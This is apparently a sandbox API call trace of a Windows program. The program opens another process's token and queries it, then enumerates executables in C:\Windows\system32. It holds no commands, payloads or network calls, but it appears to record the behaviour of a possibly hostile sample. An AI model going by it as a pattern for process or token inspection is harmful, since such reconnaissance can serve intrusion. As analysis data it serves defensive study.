	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0088.573] GetProcAddress (hModule=0x77960000, lpProcName="ZwOpenProcess") returned 0x779d6f00
	[0088.573] NtOpenProcess (in: ProcessHandle=0x20afcb0, DesiredAccess=0x400, ObjectAttributes=0x20afc80*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x20afc98*(UniqueProcess=0xdd4, UniqueThread=0x0) | out: ProcessHandle=0x20afcb0*=0x1d8) returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0088.574] GetProcAddress (hModule=0x77960000, lpProcName="ZwOpenProcessToken") returned 0x779d7e10
	[0088.574] NtOpenProcessToken (in: ProcessHandle=0x1d8, DesiredAccess=0x8, TokenHandle=0x20afcc4 | out: TokenHandle=0x20afcc4*=0x1d0) returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.574] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] GetLastError () returned 0x0
	[0088.575] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0088.575] GetProcAddress (hModule=0x77960000, lpProcName="ZwQueryInformationToken") returned 0x779d6eb0
	[0088.575] NtQueryInformationToken (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20afd34 | out: TokenInformation=0x0, ReturnLength=0x20afd34) returned 0xc0000023
	[0088.575] NtQueryInformationToken (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x4ffa20, TokenInformationLength=0x24, ReturnLength=0x20afd34 | out: TokenInformation=0x4ffa20, ReturnLength=0x20afd34) returned 0x0
	[0088.576] CloseHandle (hObject=0x1d0) returned 1
	[0088.576] CloseHandle (hObject=0x1d8) returned 1
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.576] GetLastError () returned 0x0
	[0088.577] GetLastError () returned 0x0
	[0088.577] GetSystemDirectoryW (in: lpBuffer=0x507d80, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0088.577] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0088.577] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 0x503bd0
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.577] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.578] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.579] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.580] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] StrRChrW (lpStart="PATHPING.EXE", lpEnd=0x0, wMatch=0x2e) returned=".EXE"
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
	[0088.581] FindNextFileW (in: hFindFile=0x503bd0, lpFindFileData=0x507b28 | out: lpFindFileData=0x507b28) returned 1
